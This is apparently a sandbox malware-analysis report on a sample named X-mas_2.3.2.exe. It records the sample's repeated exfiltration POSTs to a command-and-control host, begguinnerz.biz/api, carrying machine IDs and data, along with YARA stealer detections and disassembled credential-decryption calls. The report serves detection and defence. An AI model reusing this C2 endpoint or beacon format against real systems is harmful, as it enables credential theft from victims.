2024-12-30 20:20:21 UTC	1369	IN	Data Raw: 32 36 30 61 0d 0a 32 63 59 44 79 70 57 75 67 75 34 69 6d 37 78 43 6d 79 78 62 32 68 69 39 2f 45 53 32 5a 79 71 39 41 56 4d 67 6a 59 44 77 77 67 33 73 45 6e 52 5a 52 47 2f 54 7a 6d 4d 62 36 44 56 38 4b 47 70 4f 7a 63 37 59 55 39 47 47 50 6f 6b 51 35 38 45 71 6b 73 41 6a 37 54 77 7a 5a 71 35 32 76 73 4a 65 34 30 75 63 4e 5a 7a 4d 44 72 39 4e 53 61 68 58 46 4a 48 50 36 42 52 47 63 66 75 6b 35 52 59 73 4b 4b 4f 54 75 38 43 4b 4a 36 72 33 2b 71 77 30 2f 4d 67 61 57 68 68 64 66 4c 64 6b 70 4f 6f 4e 49 41 50 77 33 58 4a 79 41 39 31 73 67 74 64 4b 46 32 78 41 6e 73 4e 4c 53 4f 47 49 66 34 6c 62 6d 48 32 73 74 79 54 6b 33 6d 6e 31 59 7a 43 72 45 67 51 58 69 64 2b 32 34 37 73 67 69 69 61 4e 51 38 74 6f 30 51 6d 74 66 6d 6a 59 6e 66 79 58 68 58 56 2b 61 66 56 6a 6f Data Ascii: 260a2cYDypWugu4im7xCmyxb2hi9/ES2Zyq9AVMgjYDwwg3sEnRZRG/TzmMb6DV8KGpOzc7YU9GGPokQ58EqksAj7TwzZq52vsJe40ucNZzMDr9NSahXFJHP6BRGcfuk5RYsKKOTu8CKJ6r3+qw0/MgaWhhdfLdkpOoNIAPw3XJyA91sgtdKF2xAnsNLSOGIf4lbmH2styTk3mn1YzCrEgQXid+247sgiiaNQ8to0QmtfmjYnfyXhXV+afVjo
2024-12-30 20:20:21 UTC	1369	IN	Data Raw: 6e 66 6a 2b 67 56 73 71 56 6a 38 4b 39 38 42 6b 34 38 52 69 39 79 73 71 71 4c 30 68 54 73 59 55 2b 61 4a 4c 33 77 43 71 53 5a 50 63 4d 57 45 65 44 75 66 53 2f 51 6d 35 69 6d 70 7a 6a 4b 62 78 62 75 71 68 35 53 4c 4e 56 34 63 2f 6f 46 59 66 45 37 34 57 56 6c 67 6a 35 39 31 4b 50 30 59 71 44 65 76 4a 76 69 56 56 39 53 55 35 65 79 57 6c 4a 30 31 48 31 2b 30 77 78 41 2f 58 4f 70 65 50 77 37 37 78 7a 46 78 69 30 58 71 4c 39 38 42 72 59 41 5a 67 73 47 39 76 63 53 61 68 58 6f 59 42 4a 2b 52 58 6e 42 4d 36 67 39 42 44 35 4f 45 4f 44 76 79 43 4d 38 72 37 7a 47 2f 6c 51 62 42 34 4b 69 39 6a 76 58 49 5a 56 38 63 36 4a 45 51 66 42 4b 36 56 30 45 30 7a 49 52 34 4b 2f 67 54 72 33 75 32 62 2b 71 63 57 5a 57 47 76 65 7a 63 68 6f 73 31 53 68 7a 2b 6b 56 45 2f 57 50 73 66 Data Ascii: nfj+gVsqVj8K98Bk48Ri9ysqqL0hTsYU+aJL3wCqSZPcMWEeDufS/Qm5impzjKbxbuqh5SLNV4c/oFYfE74WVlgj591KP0YqDevJviVV9SU5eyWlJ01H1+0wxA/XOpePw77xzFxi0XqL98BrYAZgsG9vcSahXoYBJ+RXnBM6g9BD5OEODvyCM8r7zG/lQbB4Ki9jvXIZV8c6JEQfBK6V0E0zIR4K/gTr3u2b+qcWZWGvezchos1Shz+kVE/WPsf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49752	172.67.190.223	443	3140	C:\Users\user\Desktop\X-mas_2.3.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:20:22 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=R9INL4CZSW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12794 Host: begguinnerz.biz
2024-12-30 20:20:22 UTC	12794	OUT	Data Raw: 2d 2d 52 39 49 4e 4c 34 43 5a 53 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 34 32 31 41 38 33 37 45 30 33 41 36 31 39 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 52 39 49 4e 4c 34 43 5a 53 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 39 49 4e 4c 34 43 5a 53 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 64 0d 0a 2d 2d 52 39 49 4e 4c 34 43 5a 53 57 0d 0a 43 Data Ascii: --R9INL4CZSWContent-Disposition: form-data; name="hwid"A3421A837E03A61920A4C476FD51BCB1--R9INL4CZSWContent-Disposition: form-data; name="pid"2--R9INL4CZSWContent-Disposition: form-data; name="lid"HpOoIh--aadb880da83d--R9INL4CZSWC
2024-12-30 20:20:23 UTC	1128	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:20:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cvj5d7hflpu8ndtmh8nlcm94hc; expires=Fri, 25 Apr 2025 14:07:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZTVVDUZP9PFSpzih2sM8tzud8WtdR8%2FB1b%2FEiJtoLAlWFApmS9T0OKQDCj2ZiVr1jkb2lVDepYVnisTdvFoRzxJfQxDum2r5gDioJ24i9v6CQXSYXxH%2BVam951b6V%2BdLPns%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4bae8ce9943a0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1886&rtt_var=712&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13725&delivery_rate=1531200&cwnd=219&unsent_bytes=0&cid=5e2fdc85ff9a1cff&ts=551&x=0"
2024-12-30 20:20:23 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 20:20:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49758	172.67.190.223	443	3140	C:\Users\user\Desktop\X-mas_2.3.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:20:23 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=967AUNDDDSFT8CW9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15072 Host: begguinnerz.biz
2024-12-30 20:20:23 UTC	15072	OUT	Data Raw: 2d 2d 39 36 37 41 55 4e 44 44 44 53 46 54 38 43 57 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 34 32 31 41 38 33 37 45 30 33 41 36 31 39 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 39 36 37 41 55 4e 44 44 44 53 46 54 38 43 57 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 36 37 41 55 4e 44 44 44 53 46 54 38 43 57 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 Data Ascii: --967AUNDDDSFT8CW9Content-Disposition: form-data; name="hwid"A3421A837E03A61920A4C476FD51BCB1--967AUNDDDSFT8CW9Content-Disposition: form-data; name="pid"2--967AUNDDDSFT8CW9Content-Disposition: form-data; name="lid"HpOoIh--aadb880da83
2024-12-30 20:20:24 UTC	1134	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:20:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=udrbt7vuc8m35g7h21f7e41ge0; expires=Fri, 25 Apr 2025 14:07:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mVw%2BYV17dTP1qyw2BHGnAo48jYeadQYFEo9qxY8taZnAwlv%2FqlT17%2BawUul%2Fstl9hk9VLJE4CjiCHNz1bED9qIJfUJbTfb%2FNBjNciEn15yTRMv4%2FJW4QgKtGNI27%2BB9LUn4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4baefdb985e64-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1692&rtt_var=655&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=16009&delivery_rate=1645997&cwnd=246&unsent_bytes=0&cid=c796f1b61461512a&ts=508&x=0"
2024-12-30 20:20:24 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 20:20:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49768	172.67.190.223	443	3140	C:\Users\user\Desktop\X-mas_2.3.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:20:24 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FA835ZQW22VQ25Y User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20556 Host: begguinnerz.biz
2024-12-30 20:20:24 UTC	15331	OUT	Data Raw: 2d 2d 46 41 38 33 35 5a 51 57 32 32 56 51 32 35 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 34 32 31 41 38 33 37 45 30 33 41 36 31 39 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 46 41 38 33 35 5a 51 57 32 32 56 51 32 35 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 41 38 33 35 5a 51 57 32 32 56 51 32 35 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 64 0d 0a Data Ascii: --FA835ZQW22VQ25YContent-Disposition: form-data; name="hwid"A3421A837E03A61920A4C476FD51BCB1--FA835ZQW22VQ25YContent-Disposition: form-data; name="pid"3--FA835ZQW22VQ25YContent-Disposition: form-data; name="lid"HpOoIh--aadb880da83d
2024-12-30 20:20:24 UTC	5225	OUT	Data Raw: 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb Data Ascii: MMZh'F3Wun 4F([:7s~X`nO`
2024-12-30 20:20:25 UTC	1135	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:20:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gagb9krjd4rm336c82jk9bt7su; expires=Fri, 25 Apr 2025 14:07:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pfcj17BIFXi8CwnxqOjKyCBRKsuZ4LY%2Fp3zUMGGD%2B2ELZnh%2FGTszqMiqdyk%2BdoH%2BM%2BQ6FrOwDBd6Bd0Qi1oKUzrP2beYus8sKSOtUBRk8%2BMdkaJzwFXaCFx4G16oZkW6VZs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4baf76eee4333-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1657&rtt_var=634&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21514&delivery_rate=1707602&cwnd=248&unsent_bytes=0&cid=69e825c06de9e13f&ts=501&x=0"
2024-12-30 20:20:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 20:20:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49779	172.67.190.223	443	3140	C:\Users\user\Desktop\X-mas_2.3.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:20:26 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=67T0FNQL66S48HE8G72 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1286 Host: begguinnerz.biz
2024-12-30 20:20:26 UTC	1286	OUT	Data Raw: 2d 2d 36 37 54 30 46 4e 51 4c 36 36 53 34 38 48 45 38 47 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 34 32 31 41 38 33 37 45 30 33 41 36 31 39 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 36 37 54 30 46 4e 51 4c 36 36 53 34 38 48 45 38 47 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 37 54 30 46 4e 51 4c 36 36 53 34 38 48 45 38 47 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 Data Ascii: --67T0FNQL66S48HE8G72Content-Disposition: form-data; name="hwid"A3421A837E03A61920A4C476FD51BCB1--67T0FNQL66S48HE8G72Content-Disposition: form-data; name="pid"1--67T0FNQL66S48HE8G72Content-Disposition: form-data; name="lid"HpOoIh--aa
2024-12-30 20:20:27 UTC	1130	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:20:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i0avv1j62coqqgh8i84eok4otu; expires=Fri, 25 Apr 2025 14:07:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fdr3houB2ZxdNfuneV13ZZAwfd%2FENBeJQxKETPKDKMTnOtamdyDYPVUMUZdRJGWGPZVCgfgmsWGSUcAcVVytNDE7CcHNdwIu9w1%2F7%2FhlXp%2FJ1%2FrmzY%2BbIWirfud9U9LYLIg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4bb013ccaf5f7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1512&min_rtt=1510&rtt_var=570&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2203&delivery_rate=1912246&cwnd=239&unsent_bytes=0&cid=6270a300e1a45aee&ts=846&x=0"
2024-12-30 20:20:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 20:20:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	54613	172.67.190.223	443	3140	C:\Users\user\Desktop\X-mas_2.3.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:20:27 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VPWHDOX2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1055 Host: begguinnerz.biz
2024-12-30 20:20:27 UTC	1055	OUT	Data Raw: 2d 2d 56 50 57 48 44 4f 58 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 34 32 31 41 38 33 37 45 30 33 41 36 31 39 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 56 50 57 48 44 4f 58 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 50 57 48 44 4f 58 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 64 0d 0a 2d 2d 56 50 57 48 44 4f 58 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --VPWHDOX2Content-Disposition: form-data; name="hwid"A3421A837E03A61920A4C476FD51BCB1--VPWHDOX2Content-Disposition: form-data; name="pid"1--VPWHDOX2Content-Disposition: form-data; name="lid"HpOoIh--aadb880da83d--VPWHDOX2Content-D
2024-12-30 20:20:28 UTC	1128	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:20:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rrren4n9v33cl9q798m3pt8he0; expires=Fri, 25 Apr 2025 14:07:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aucGOKGmw5%2FfJk5CvYEmw3G5IMecAEmpiaLp0kUp62icwBcTHoOj5P%2BWwVh0GtxfmAQoEhgm40eBz9E994PmiiJQ%2BP5S28mzEadA3S9FWnb%2FAY%2FCjcgTyDCEgqfVwuhZXiM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4bb0a08fd727d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1828&min_rtt=1824&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1961&delivery_rate=1569048&cwnd=219&unsent_bytes=0&cid=17b5aed39663f37f&ts=543&x=0"
2024-12-30 20:20:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 20:20:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:19:54
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\X-mas_2.3.2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\X-mas_2.3.2.exe"
Imagebase:	0x400000
File size:	325'632 bytes
MD5 hash:	3DFD44F9DF3A6C7B1D20A12A20BA0C67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2578235069.0000000000510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2343827885.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2332836527.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2317946909.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2319028113.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:20:27
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 1900
Imagebase:	0xb80000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	9.1%
Signature Coverage:	68.8%
Total number of Nodes:	320
Total number of Limit Nodes:	23

Executed Functions

Function 00438860 Relevance: 32.2, APIs: 11, Strings: 7, Instructions: 666
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438AE7
SysAllocString.OLEAUT32(k2`0), ref: 00438B60
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B9D
SysAllocString.OLEAUT32(07B705B3), ref: 00438BEA
SysAllocString.OLEAUT32(09C50FBD), ref: 00438CAD
VariantInit.OLEAUT32(EFEEEDF4), ref: 00438D1C
VariantClear.OLEAUT32(?), ref: 00438E8F
SysFreeString.OLEAUT32(?), ref: 00438EB3
SysFreeString.OLEAUT32(?), ref: 00438EB9
SysFreeString.OLEAUT32(00000000), ref: 00438EC6
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438EFA

Strings

]E, xrefs: 00439062
k2`0, xrefs: 00438B5B, 00438B5F
,./,, xrefs: 00438947
x;, xrefs: 00438C34
S, xrefs: 00438C24
]E, xrefs: 00438C2C
b>c<, xrefs: 00438AFD

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
API String ID: 2573436264-4038474941
Opcode ID: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
Instruction ID: 6e5b62aa8b1ec0da306810ad309870e49cdd1aa0d64757ab7dc6e3fbd6c770b3
Opcode Fuzzy Hash: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
Instruction Fuzzy Hash: 3122EFB66083419BD310CF28C885B6BBBE5EFC9314F14892DF595DB2A0DB79D805CB86

Function 00419362 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 390
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004197EB

Strings

D$p, xrefs: 004195C2
x">*, xrefs: 00419430
#1!%, xrefs: 00419539
e, xrefs: 0041955A
14'", xrefs: 00419470
'>0=, xrefs: 0041952E
-&64, xrefs: 00419544
?7?0, xrefs: 0041950D
*8$), xrefs: 00419523

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: CryptDataInitializeThunkUnprotect
String ID: #1!%$'>0=$*8$)$-&64$14'"$?7?0$e$x">*$D$p
API String ID: 279577407-4262920783
Opcode ID: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
Instruction ID: e77fc135ad70ed6736d1295220b367ee2e65166797322382e6457787232dfc05
Opcode Fuzzy Hash: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
